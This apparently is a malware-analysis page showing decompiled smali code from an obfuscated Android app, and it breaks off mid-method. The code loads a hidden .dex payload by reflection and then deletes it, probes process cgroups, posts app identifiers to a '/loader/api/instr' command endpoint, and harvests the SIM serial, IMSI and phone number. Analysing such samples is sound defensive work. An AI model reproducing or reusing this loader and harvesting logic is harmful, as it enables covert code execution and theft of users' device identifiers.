  • java.util.ArrayList.get
  • java.io.File.getAbsolutePath
  • android.content.Context.getPackageManager
  • android.content.Context.getPackageName
  • android.content.pm.PackageManager.getPackageInfo
  • java.lang.Class.forName
  • java.lang.Class.getConstructor
  • android.content.Context.getClassLoader
  • java.lang.reflect.Constructor.newInstance
  • java.lang.Object.getClass
  • java.lang.Class.getMethod
  • java.lang.reflect.Method.invoke
  • java.lang.Class.getDeclaredMethod
  • java.lang.reflect.Method.invoke
  • java.io.File.delete
  • android.content.Context.getFilesDir
  • java.io.File.getParent
  • java.io.File.getName
  • java.io.File.<init>
  • java.io.File.exists
  • java.io.File.delete
  • android.content.Context.getFilesDir
  • java.io.File.getParent
  • java.io.File.getName
  • java.io.File.<init>
  • java.io.File.exists
  • java.io.File.delete
Strings
  • .dex
  • dalvik.system.DexClassLoader
  • loadClass
Position Instruction Meta Information
0const/4 v0, 0x0
2iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/NvHUu;->Odjrct:Lcom/czybg/eqtbdmzpklrgyns/cXdqo;
4iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/NvHUu;->DiXsQ:Landroid/content/Context;
6invoke-virtual {v2}, Landroid/content/Context;->getFilesDir()Ljava/io/File;
7move-result-object v2
8new-instance v3, Ljava/lang/StringBuilder;
10invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
11const/16 v4, 0x10
13invoke-static {v4}, Lcom/czybg/eqtbdmzpklrgyns/jVOak;->DiXsQ(I)Ljava/lang/String;
14move-result-object v4
16invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
17move-result-object v3
19const-string v4, ".dex"
21invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
22move-result-object v3
24invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
25move-result-object v3
27invoke-virtual {v1, v2, v3}, Lcom/czybg/eqtbdmzpklrgyns/cXdqo;->DiXsQ(Ljava/io/File;Ljava/lang/String;)Ljava/io/File;
28move-result-object v2
29try_start_26:
30invoke-virtual {p2}, Ljava/util/ArrayList;->size()I
31move-result v1
32new-array v3, v1, [Ljava/lang/Class;
34invoke-virtual {p2}, Ljava/util/ArrayList;->size()I
35move-result v1
36new-array v4, v1, [Ljava/lang/Object;
37move v1, v0
38goto_33:
39invoke-virtual {p2}, Ljava/util/ArrayList;->size()I
40move-result v0
41if-ge v1, v0, :cond_53
43invoke-virtual {p2, v1}, Ljava/util/ArrayList;->get(I)Ljava/lang/Object;
44move-result-object v0
45check-cast v0, Landroid/util/Pair;
47iget-object v0, v0, Landroid/util/Pair;->first:Ljava/lang/Object;
48check-cast v0, Ljava/lang/Class;
49aput-object v0, v3, v1
51invoke-virtual {p2, v1}, Ljava/util/ArrayList;->get(I)Ljava/lang/Object;
52move-result-object v0
53check-cast v0, Landroid/util/Pair;
55iget-object v0, v0, Landroid/util/Pair;->second:Ljava/lang/Object;
56aput-object v0, v4, v1
57add-int/lit8 v0, v1, 0x1
58move v1, v0
59goto/16 :goto_33
60cond_53:
61invoke-virtual {v2}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
62move-result-object v0
64iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/NvHUu;->DiXsQ:Landroid/content/Context;
66invoke-virtual {v1}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
67move-result-object v5
69invoke-virtual {v1}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
70move-result-object v1
71const/4 v6, 0x0
73invoke-virtual {v5, v1, v6}, Landroid/content/pm/PackageManager;->getPackageInfo(Ljava/lang/String;I)Landroid/content/pm/PackageInfo;
74move-result-object v1
76iget-object v1, v1, Landroid/content/pm/PackageInfo;->applicationInfo:Landroid/content/pm/ApplicationInfo;
78iget-object v1, v1, Landroid/content/pm/ApplicationInfo;->dataDir:Ljava/lang/String;
80const-string v5, "dalvik.system.DexClassLoader"
82invoke-static {v5}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
83move-result-object v5
84const/4 v6, 0x4
85new-array v6, v6, [Ljava/lang/Class;
86const/4 v7, 0x0
87const-class v8, Ljava/lang/String;
88aput-object v8, v6, v7
89const/4 v7, 0x1
90const-class v8, Ljava/lang/String;
91aput-object v8, v6, v7
92const/4 v7, 0x2
93const-class v8, Ljava/lang/String;
94aput-object v8, v6, v7
95const/4 v7, 0x3
96const-class v8, Ljava/lang/ClassLoader;
97aput-object v8, v6, v7
99invoke-virtual {v5, v6}, Ljava/lang/Class;->getConstructor([Ljava/lang/Class;)Ljava/lang/reflect/Constructor;
100move-result-object v5
101const/4 v6, 0x4
102new-array v6, v6, [Ljava/lang/Object;
103const/4 v7, 0x0
104aput-object v0, v6, v7
105const/4 v0, 0x1
106aput-object v1, v6, v0
107const/4 v0, 0x2
108const/4 v1, 0x0
109aput-object v1, v6, v0
110const/4 v0, 0x3
112iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/NvHUu;->DiXsQ:Landroid/content/Context;
114invoke-virtual {v1}, Landroid/content/Context;->getClassLoader()Ljava/lang/ClassLoader;
115move-result-object v1
116aput-object v1, v6, v0
118invoke-virtual {v5, v6}, Ljava/lang/reflect/Constructor;->newInstance([Ljava/lang/Object;)Ljava/lang/Object;
119move-result-object v0
121invoke-virtual {v0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
122move-result-object v1
124const-string v5, "loadClass"
125const/4 v6, 0x1
126new-array v6, v6, [Ljava/lang/Class;
127const/4 v7, 0x0
128const-class v8, Ljava/lang/String;
129aput-object v8, v6, v7
131invoke-virtual {v1, v5, v6}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
132move-result-object v1
133const/4 v5, 0x1
134new-array v5, v5, [Ljava/lang/Object;
135const/4 v6, 0x0
137iget-object v7, p0, Lcom/czybg/eqtbdmzpklrgyns/NvHUu;->info:Lcom/czybg/eqtbdmzpklrgyns/qaNho;
139iget-object v7, v7, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->LmcGi:Ljava/lang/String;
140aput-object v7, v5, v6
142invoke-virtual {v1, v0, v5}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
143move-result-object v0
144check-cast v0, Ljava/lang/Class;
146invoke-virtual {v0, p1, v3}, Ljava/lang/Class;->getDeclaredMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
147move-result-object v0
148const/4 v1, 0x0
150invoke-virtual {v0, v1, v4}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
151try_end_cf: move-result-object v0
153invoke-virtual {v2}, Ljava/io/File;->delete()Z
154new-instance v1, Ljava/io/File;
156iget-object v3, p0, Lcom/czybg/eqtbdmzpklrgyns/NvHUu;->DiXsQ:Landroid/content/Context;
158invoke-virtual {v3}, Landroid/content/Context;->getFilesDir()Ljava/io/File;
159move-result-object v3
161invoke-virtual {v3}, Ljava/io/File;->getParent()Ljava/lang/String;
162move-result-object v3
164invoke-virtual {v2}, Ljava/io/File;->getName()Ljava/lang/String;
165move-result-object v2
167invoke-direct {v1, v3, v2}, Ljava/io/File;-><init>(Ljava/lang/String;Ljava/lang/String;)V
169invoke-virtual {v1}, Ljava/io/File;->exists()Z
170move-result v2
171if-eqz v2, :cond_ef
173invoke-virtual {v1}, Ljava/io/File;->delete()Z
174cond_ef: return-object v0
175catchall_f0: move-exception v0
177invoke-virtual {v2}, Ljava/io/File;->delete()Z
178new-instance v1, Ljava/io/File;
180iget-object v3, p0, Lcom/czybg/eqtbdmzpklrgyns/NvHUu;->DiXsQ:Landroid/content/Context;
182invoke-virtual {v3}, Landroid/content/Context;->getFilesDir()Ljava/io/File;
183move-result-object v3
185invoke-virtual {v3}, Ljava/io/File;->getParent()Ljava/lang/String;
186move-result-object v3
188invoke-virtual {v2}, Ljava/io/File;->getName()Ljava/lang/String;
189move-result-object v2
191invoke-direct {v1, v3, v2}, Ljava/io/File;-><init>(Ljava/lang/String;Ljava/lang/String;)V
193invoke-virtual {v1}, Ljava/io/File;->exists()Z
194move-result v2
195if-eqz v2, :cond_110
197invoke-virtual {v1}, Ljava/io/File;->delete()Z
198cond_110: throw v0
Cross References
APIs
  • com.czybg.eqtbdmzpklrgyns.bhrmCXSP.DiXsQ
  • java.lang.String.contains
  • com.czybg.eqtbdmzpklrgyns.hfQmvak.<init>
  • java.lang.String.contains
  • java.lang.String.split
  • java.lang.String.replace
  • java.lang.Integer.parseInt
  • com.czybg.eqtbdmzpklrgyns.xGabTJZc.DiXsQ
  • java.lang.String.contains
  • com.czybg.eqtbdmzpklrgyns.hfQmvak.<init>
  • java.lang.String.contains
  • java.lang.String.lastIndexOf
  • java.lang.String.substring
  • java.lang.Integer.parseInt
  • com.czybg.eqtbdmzpklrgyns.xGabTJZc.DiXsQ
  • java.lang.String.startsWith
  • java.io.File.<init>
  • java.io.File.exists
  • com.czybg.eqtbdmzpklrgyns.hfQmvak.<init>
  • com.czybg.eqtbdmzpklrgyns.jAdeqNK.DiXsQ
  • com.czybg.eqtbdmzpklrgyns.xGabTJZc.DiXsQ
  • java.lang.Integer.parseInt
  • com.czybg.eqtbdmzpklrgyns.xGabTJZc.DiXsQ
Strings
  • cpuacct
  • cpu
  • pid_
  • bg_non_interactive
  • /
  • uid_
  • apps
  • /data/data
Position Instruction Meta Information
0const/4 v1, 0x0
1const/4 v0, 0x1
3invoke-direct {p0, p1}, Lcom/czybg/eqtbdmzpklrgyns/nMWvySG;-><init>(I)V
4sget-boolean v2, Lcom/czybg/eqtbdmzpklrgyns/VsOwEHi;->xnLvoQ:Z
5if-eqz v2, :cond_b6
6iget v2, p0, Lcom/czybg/eqtbdmzpklrgyns/nMWvySG;->hZyMGHgz:I
8invoke-static {v2}, Lcom/czybg/eqtbdmzpklrgyns/bhrmCXSP;->DiXsQ(I)Lcom/czybg/eqtbdmzpklrgyns/bhrmCXSP;
9move-result-object v2
11const-string v3, "cpuacct"
13invoke-virtual {v2, v3}, Lcom/czybg/eqtbdmzpklrgyns/bhrmCXSP;->DiXsQ(Ljava/lang/String;)Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;
14move-result-object v3
16const-string v4, "cpu"
18invoke-virtual {v2, v4}, Lcom/czybg/eqtbdmzpklrgyns/bhrmCXSP;->DiXsQ(Ljava/lang/String;)Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;
19move-result-object v2
20sget v4, Landroid/os/Build$VERSION;->SDK_INT:I
21const/16 v5, 0x15
22if-lt v4, v5, :cond_6f
23if-eqz v2, :cond_2f
24if-eqz v3, :cond_2f
26iget-object v4, v3, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;->LmcGi:Ljava/lang/String;
28const-string v5, "pid_"
30invoke-virtual {v4, v5}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
31move-result v4
32if-nez v4, :cond_35
33cond_2f: new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/hfQmvak;
35invoke-direct {v0, p1}, Lcom/czybg/eqtbdmzpklrgyns/hfQmvak;-><init>(I)V
36throw v0
37cond_35:
38iget-object v2, v2, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;->LmcGi:Ljava/lang/String;
40const-string v4, "bg_non_interactive"
42invoke-virtual {v2, v4}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
43move-result v2
44if-nez v2, :cond_5e
45try_start_3f:
46iget-object v1, v3, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;->LmcGi:Ljava/lang/String;
48const-string v2, "/"
50invoke-virtual {v1, v2}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String;
51move-result-object v1
52const/4 v2, 0x1
53aget-object v1, v1, v2
55const-string v2, "uid_"
57const-string v3, ""
59invoke-virtual {v1, v2, v3}, Ljava/lang/String;->replace(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;
60move-result-object v1
62invoke-static {v1}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I
63try_end_55: move-result v1
64move v6, v1
65move v1, v0
66move v0, v6
67goto_59: iput-boolean v1, p0, Lcom/czybg/eqtbdmzpklrgyns/VsOwEHi;->DiXsQ:Z
68iput v0, p0, Lcom/czybg/eqtbdmzpklrgyns/VsOwEHi;->Odjrct:I
69return-void
70cond_5e: move v0, v1
71goto/16 :goto_3f
72catch_60: move-exception v1
73iget v1, p0, Lcom/czybg/eqtbdmzpklrgyns/nMWvySG;->hZyMGHgz:I
75invoke-static {v1}, Lcom/czybg/eqtbdmzpklrgyns/xGabTJZc;->DiXsQ(I)Lcom/czybg/eqtbdmzpklrgyns/xGabTJZc;
76move-result-object v1
78invoke-virtual {v1}, Lcom/czybg/eqtbdmzpklrgyns/xGabTJZc;->DiXsQ()I
79move-result v1
80move v6, v1
81move v1, v0
82move v0, v6
83goto/16 :goto_59
84cond_6f: if-eqz v2, :cond_7d
85if-eqz v3, :cond_7d
87iget-object v4, v2, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;->LmcGi:Ljava/lang/String;
89const-string v5, "apps"
91invoke-virtual {v4, v5}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
92move-result v4
93if-nez v4, :cond_83
94cond_7d: new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/hfQmvak;
96invoke-direct {v0, p1}, Lcom/czybg/eqtbdmzpklrgyns/hfQmvak;-><init>(I)V
97throw v0
98cond_83:
99iget-object v2, v2, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;->LmcGi:Ljava/lang/String;
101const-string v4, "bg_non_interactive"
103invoke-virtual {v2, v4}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
104move-result v2
105if-nez v2, :cond_a5
106goto_8d:
107iget-object v1, v3, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;->LmcGi:Ljava/lang/String;
109iget-object v2, v3, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;->LmcGi:Ljava/lang/String;
111const-string v3, "/"
113invoke-virtual {v2, v3}, Ljava/lang/String;->lastIndexOf(Ljava/lang/String;)I
114move-result v2
115add-int/lit8 v2, v2, 0x1
117invoke-virtual {v1, v2}, Ljava/lang/String;->substring(I)Ljava/lang/String;
118move-result-object v1
120invoke-static {v1}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I
121try_end_a0: move-result v1
122move v6, v1
123move v1, v0
124move v0, v6
125goto/16 :goto_59
126cond_a5: move v0, v1
127goto/16 :goto_8d
128catch_a7: move-exception v1
129iget v1, p0, Lcom/czybg/eqtbdmzpklrgyns/nMWvySG;->hZyMGHgz:I
131invoke-static {v1}, Lcom/czybg/eqtbdmzpklrgyns/xGabTJZc;->DiXsQ(I)Lcom/czybg/eqtbdmzpklrgyns/xGabTJZc;
132move-result-object v1
134invoke-virtual {v1}, Lcom/czybg/eqtbdmzpklrgyns/xGabTJZc;->DiXsQ()I
135move-result v1
136move v6, v1
137move v1, v0
138move v0, v6
139goto/16 :goto_59
140cond_b6:
141iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/VsOwEHi;->LmcGi:Ljava/lang/String;
143const-string v3, "/"
145invoke-virtual {v2, v3}, Ljava/lang/String;->startsWith(Ljava/lang/String;)Z
146move-result v2
147if-nez v2, :cond_d1
148new-instance v2, Ljava/io/File;
150const-string v3, "/data/data"
152invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/VsOwEHi;->DiXsQ()Ljava/lang/String;
153move-result-object v4
155invoke-direct {v2, v3, v4}, Ljava/io/File;-><init>(Ljava/lang/String;Ljava/lang/String;)V
157invoke-virtual {v2}, Ljava/io/File;->exists()Z
158move-result v2
159if-nez v2, :cond_d7
160cond_d1: new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/hfQmvak;
162invoke-direct {v0, p1}, Lcom/czybg/eqtbdmzpklrgyns/hfQmvak;-><init>(I)V
163throw v0
164cond_d7: iget v2, p0, Lcom/czybg/eqtbdmzpklrgyns/nMWvySG;->hZyMGHgz:I
166invoke-static {v2}, Lcom/czybg/eqtbdmzpklrgyns/jAdeqNK;->DiXsQ(I)Lcom/czybg/eqtbdmzpklrgyns/jAdeqNK;
167move-result-object v2
168iget v3, p0, Lcom/czybg/eqtbdmzpklrgyns/nMWvySG;->hZyMGHgz:I
170invoke-static {v3}, Lcom/czybg/eqtbdmzpklrgyns/xGabTJZc;->DiXsQ(I)Lcom/czybg/eqtbdmzpklrgyns/xGabTJZc;
171move-result-object v3
173iget-object v2, v2, Lcom/czybg/eqtbdmzpklrgyns/jAdeqNK;->DiXsQ:[Ljava/lang/String;
174const/16 v4, 0x28
175aget-object v2, v2, v4
177invoke-static {v2}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I
178move-result v2
179if-nez v2, :cond_f8
180goto_ef:
181invoke-virtual {v3}, Lcom/czybg/eqtbdmzpklrgyns/xGabTJZc;->DiXsQ()I
182move-result v1
183move v6, v1
184move v1, v0
185move v0, v6
186goto/16 :goto_59
187cond_f8: move v0, v1
188goto/16 :goto_ef
Cross References
APIs
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • java.net.URL.<init>
  • java.net.URL.openConnection
  • android.content.Context.getPackageName
  • javax.net.ssl.HttpsURLConnection.addRequestProperty
  • org.json.JSONArray.toString
  • javax.net.ssl.HttpsURLConnection.addRequestProperty
  • javax.net.ssl.HttpsURLConnection.setRequestMethod
  • javax.net.ssl.HttpsURLConnection.setDoOutput
  • javax.net.ssl.HttpsURLConnection.setConnectTimeout
  • javax.net.ssl.HttpsURLConnection.setReadTimeout
  • org.json.JSONObject.toString
  • java.lang.String.getBytes
  • javax.net.ssl.HttpsURLConnection.getResponseCode
  • java.io.IOException.<init>
  • javax.net.ssl.HttpsURLConnection.getHeaderFieldInt
  • com.czybg.eqtbdmzpklrgyns.szqyx.<init>
  • java.io.ByteArrayOutputStream.toString
  • org.json.JSONObject.<init>
Strings
  • /loader/api/instr
  • pkg
  • sid
  • tag
  • services
  • version
  • 14
  • POST
  • invalid status code
  • delay
Position Instruction Meta Information
0try_start_0: new-instance v0, Ljava/net/URL;
1new-instance v1, Ljava/lang/StringBuilder;
3invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
5invoke-static {}, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->DiXsQ()Ljava/lang/String;
6move-result-object v2
8invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
9move-result-object v1
11const-string v2, "/loader/api/instr"
13invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
14move-result-object v1
16invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
17move-result-object v1
19invoke-direct {v0, v1}, Ljava/net/URL;-><init>(Ljava/lang/String;)V
21invoke-virtual {v0}, Ljava/net/URL;->openConnection()Ljava/net/URLConnection;
22move-result-object v0
23check-cast v0, Ljavax/net/ssl/HttpsURLConnection;
25const-string v1, "pkg"
27iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/uKHWhZbq;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/BtXsH;
29iget-object v2, v2, Lcom/czybg/eqtbdmzpklrgyns/BtXsH;->LmcGi:Landroid/content/Context;
31invoke-virtual {v2}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
32move-result-object v2
34invoke-virtual {v0, v1, v2}, Ljavax/net/ssl/HttpsURLConnection;->addRequestProperty(Ljava/lang/String;Ljava/lang/String;)V
36const-string v1, "sid"
38iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/uKHWhZbq;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/BtXsH;
40iget-object v2, v2, Lcom/czybg/eqtbdmzpklrgyns/BtXsH;->DiXsQ:Ljava/lang/String;
42invoke-virtual {v0, v1, v2}, Ljavax/net/ssl/HttpsURLConnection;->addRequestProperty(Ljava/lang/String;Ljava/lang/String;)V
44const-string v1, "tag"
46iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/uKHWhZbq;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/BtXsH;
48iget-object v2, v2, Lcom/czybg/eqtbdmzpklrgyns/BtXsH;->Odjrct:Ljava/lang/String;
50invoke-virtual {v0, v1, v2}, Ljavax/net/ssl/HttpsURLConnection;->addRequestProperty(Ljava/lang/String;Ljava/lang/String;)V
52const-string v1, "services"
54iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/uKHWhZbq;->DiXsQ:Ljava/util/List;
56invoke-static {v2}, Lcom/czybg/eqtbdmzpklrgyns/BtXsH;->DiXsQ(Ljava/util/List;)Lorg/json/JSONArray;
57move-result-object v2
59invoke-virtual {v2}, Lorg/json/JSONArray;->toString()Ljava/lang/String;
60move-result-object v2
62invoke-virtual {v0, v1, v2}, Ljavax/net/ssl/HttpsURLConnection;->addRequestProperty(Ljava/lang/String;Ljava/lang/String;)V
64const-string v1, "version"
66const-string v2, "14"
68invoke-virtual {v0, v1, v2}, Ljavax/net/ssl/HttpsURLConnection;->addRequestProperty(Ljava/lang/String;Ljava/lang/String;)V
70const-string v1, "POST"
72invoke-virtual {v0, v1}, Ljavax/net/ssl/HttpsURLConnection;->setRequestMethod(Ljava/lang/String;)V
73const/4 v1, 0x1
75invoke-virtual {v0, v1}, Ljavax/net/ssl/HttpsURLConnection;->setDoOutput(Z)V
76const/16 v1, 0x7530
78invoke-virtual {v0, v1}, Ljavax/net/ssl/HttpsURLConnection;->setConnectTimeout(I)V
79const/16 v1, 0x7530
81invoke-virtual {v0, v1}, Ljavax/net/ssl/HttpsURLConnection;->setReadTimeout(I)V
83invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/Odjrct;->DiXsQ(Ljava/net/URLConnection;)V
85iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/uKHWhZbq;->Odjrct:Lorg/json/JSONObject;
87invoke-virtual {v1}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
88move-result-object v1
90invoke-virtual {v1}, Ljava/lang/String;->getBytes()[B
91move-result-object v1
93invoke-static {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/Odjrct;->DiXsQ(Ljava/net/URLConnection;[B)V
95invoke-virtual {v0}, Ljavax/net/ssl/HttpsURLConnection;->getResponseCode()I
96move-result v1
97const/16 v2, 0xc8
98if-eq v1, v2, :cond_92
99new-instance v0, Ljava/io/IOException;
101const-string v1, "invalid status code"
103invoke-direct {v0, v1}, Ljava/io/IOException;-><init>(Ljava/lang/String;)V
104throw v0
105catch_8a: move-exception v0
106move-object v1, v0
107new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/NQaBq;
109invoke-direct {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/NQaBq;-><init>(Ljava/lang/Exception;)V
110goto_91: return-object v0
111cond_92:
112const-string v1, "delay"
113const/4 v2, 0x0
115invoke-virtual {v0, v1, v2}, Ljavax/net/ssl/HttpsURLConnection;->getHeaderFieldInt(Ljava/lang/String;I)I
116move-result v1
117if-lez v1, :cond_a1
118new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/szqyx;
120invoke-direct {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/szqyx;-><init>(I)V
121throw v0
122cond_a1:
123invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/Odjrct;->Odjrct(Ljava/net/URLConnection;)Ljava/io/ByteArrayOutputStream;
124move-result-object v0
125new-instance v1, Lorg/json/JSONObject;
127invoke-virtual {v0}, Ljava/io/ByteArrayOutputStream;->toString()Ljava/lang/String;
128move-result-object v0
130invoke-direct {v1, v0}, Lorg/json/JSONObject;-><init>(Ljava/lang/String;)V
131new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/NQaBq;
133invoke-static {v1}, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->DiXsQ(Lorg/json/JSONObject;)Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;
134move-result-object v1
136invoke-direct {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/NQaBq;-><init>(Ljava/lang/Object;)V
137try_end_b7: goto/16 :goto_91
Cross References
APIs
  • java.lang.Object.<init>
  • android.telephony.TelephonyManager.getNetworkCountryIso
  • android.telephony.TelephonyManager.getNetworkOperatorName
  • android.telephony.TelephonyManager.getSimOperator
  • android.telephony.TelephonyManager.isNetworkRoaming
  • android.telephony.TelephonyManager.getSimSerialNumber
  • java.lang.String.isEmpty
  • android.content.SharedPreferences.edit
  • android.content.SharedPreferences$Editor.putString
  • android.content.SharedPreferences$Editor.commit
  • java.lang.String.isEmpty
  • android.content.SharedPreferences.getString
  • android.telephony.TelephonyManager.getSimCountryIso
  • android.telephony.TelephonyManager.getSimOperator
  • android.telephony.TelephonyManager.getNetworkOperatorName
  • android.telephony.TelephonyManager.getLine1Number
  • android.telephony.TelephonyManager.getSubscriberId
  • java.lang.String.isEmpty
  • android.content.SharedPreferences.edit
  • android.content.SharedPreferences$Editor.putString
  • android.content.SharedPreferences$Editor.commit
  • java.lang.String.isEmpty
  • android.content.SharedPreferences.getString
Strings
  • simSerial
  • imsi
Position Instruction Meta Information
0iput-object p1, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->lVfyLT:Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;
2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
4const-string v0, ""
5iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->DiXsQ:Ljava/lang/String;
7const-string v0, ""
8iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->Odjrct:Ljava/lang/String;
10const-string v0, ""
11iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->LmcGi:Ljava/lang/String;
13const-string v0, ""
14iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->hZyMGHgz:Ljava/lang/String;
16const-string v0, ""
17iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->xnLvoQ:Ljava/lang/String;
19const-string v0, ""
20iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->jVOak:Ljava/lang/String;
22const-string v0, ""
23iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->CyGFDR:Ljava/lang/String;
25const-string v0, ""
26iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->EZmcnv:Ljava/lang/String;
28const-string v0, ""
29iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->phHwgb:Ljava/lang/String;
30const/4 v0, 0x0
31iput-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->uKFQsLn:Z
32try_start_2c:
33invoke-virtual {p2}, Landroid/telephony/TelephonyManager;->getNetworkCountryIso()Ljava/lang/String;
34move-result-object v0
35iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->DiXsQ:Ljava/lang/String;
36try_end_32:
37invoke-virtual {p2}, Landroid/telephony/TelephonyManager;->getNetworkOperatorName()Ljava/lang/String;
38move-result-object v0
39iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->Odjrct:Ljava/lang/String;
40try_end_38:
41invoke-virtual {p2}, Landroid/telephony/TelephonyManager;->getSimOperator()Ljava/lang/String;
42move-result-object v0
43iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->LmcGi:Ljava/lang/String;
44try_start_3e:
45invoke-virtual {p2}, Landroid/telephony/TelephonyManager;->isNetworkRoaming()Z
46move-result v0
47iput-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->uKFQsLn:Z
48goto_44:
49invoke-virtual {p2}, Landroid/telephony/TelephonyManager;->getSimSerialNumber()Ljava/lang/String;
50move-result-object v0
51iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->CyGFDR:Ljava/lang/String;
53iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->CyGFDR:Ljava/lang/String;
54if-eqz v0, :cond_69
56iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->CyGFDR:Ljava/lang/String;
58invoke-virtual {v0}, Ljava/lang/String;->isEmpty()Z
59move-result v0
60if-nez v0, :cond_69
62iget-object v0, p1, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/KQHWJgLX;
64iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->CyGFDR:Ljava/lang/String;
66iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/KQHWJgLX;->DiXsQ:Landroid/content/SharedPreferences;
68invoke-interface {v0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
69move-result-object v0
71const-string v2, "simSerial"
73invoke-interface {v0, v2, v1}, Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String;Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
74move-result-object v0
76invoke-interface {v0}, Landroid/content/SharedPreferences$Editor;->commit()Z
77cond_69:
